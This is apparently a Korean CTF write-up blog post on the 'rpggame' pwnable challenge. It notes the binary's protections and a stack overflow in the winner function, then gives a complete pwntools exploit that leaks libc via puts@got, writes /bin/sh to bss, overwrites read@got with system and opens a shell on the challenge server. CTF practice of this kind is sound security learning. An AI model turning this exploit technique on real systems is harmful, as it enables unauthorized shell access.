hOwDayS 선린 10720
TRUSTEALTH rpggame 본문
소개
디미고에서 CTF한다는 소식을 나중에 알고(주변 이쪽분야 지인이 없다...) 참가했는데
포너블 풀다가 끄적끄적 한문제 적어본다..
보호 기법
RELRO | Partial RELRO |
Stack Canary | No Canary |
NX | NX enabled |
PIE | No Pie |
분석
메뉴
fight
trainning
winner
winner 함수에 read에서 취약점이 생기므로 winner를 실행시키긴 위해선 trainning을 통해 power를 800을 넘기면 된다
Leak
Leak libc , using puts_got
Exploit
1. write /bin/sh on bss
2. overwrite read_got to system
3. run read_plt
Exploit Code
서버 환경에 맞추기위해 s.recv()를 많이 썼습니다.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 | from pwn import * s = remote("198.13.62.9",5467) e = ELF("./libc-2.23.so") puts_plt = 0x8048410 puts_got = 0x804a014 read_plt = 0x80483f0 read_got = 0x804a00c pr = 0x80488cb pppr = 0x80488c9 bss = 0x0804a030 + 100 for i in range(20): #trainning s.recv() s.sendline(str(3)) s.recv() #BUF s.recv() s.sendline(str(1)) s.recv() s.recv() payload = "A" *0x36 #buf payload += "A" * 4 #sfp #libc leak payload += p32(puts_plt) payload += p32(pr) payload += p32(puts_got) #read /bin/sh on bss payload += p32(read_plt) payload += p32(pppr) payload += p32(0) payload += p32(bss) payload += p32(100) #overwrite read to system payload += p32(read_plt) payload += p32(pppr) payload += p32(0) payload += p32(read_got) payload += p32(100) #call shell payload += p32(read_plt) payload += "AAAA" payload += p32(bss) s.send(payload) leak = u32(s.recv(4)[0:]) libc = leak - e.symbols["puts"] system_addr = libc + e.symbols["system"] log.info("Leak libc : " +hex(libc)) log.info("System addr : " + hex(system_addr)) s.recv() s.send("/bin/sh") s.recv() s.send(p32(system_addr)) s.interactive() | cs |
'CTF' 카테고리의 다른 글
| TRSUTCTF sysrop (0) | 2018.03.08 |
|---|---|
| ROOTCTF Allocate (0) | 2018.03.04 |
| 0ctf babyheap (0) | 2018.03.01 |
| ROOTCTF Factorization (0) | 2018.02.20 |
| Codegate 2018 BaskinRobins (0) | 2018.02.09 |
'CTF' Related Articles
more
Comments